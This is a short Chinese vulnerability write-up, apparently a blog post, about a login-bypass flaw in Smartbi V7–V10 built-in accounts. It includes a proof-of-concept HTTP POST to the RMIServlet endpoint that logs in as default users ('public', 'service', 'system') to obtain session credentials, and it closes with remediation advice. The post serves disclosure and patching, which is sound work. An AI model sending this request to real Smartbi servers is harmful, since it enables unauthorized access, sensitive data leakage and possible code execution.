Smartbi 内置用户登陆绕过漏洞

一、软件背景

Smartbi 大数据分析产品融合 BI 定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。


二、漏洞分析

Smartbi 在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。

三、版本范围

V7 <= Smartbi <= V10
 

四、漏洞POC

POST /smartbi/vision/RMIServlet HTTP/1.1 
Host: your-ip 
Content-Type: application/x-www-form-urlencoded 

className=UserService&methodName=loginFromDB&params=["system","0a"]

其中params用户可以为public service system其中一个。0a为默认密码的表示。

五、修复 建议

删除默认账户

升级补丁

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值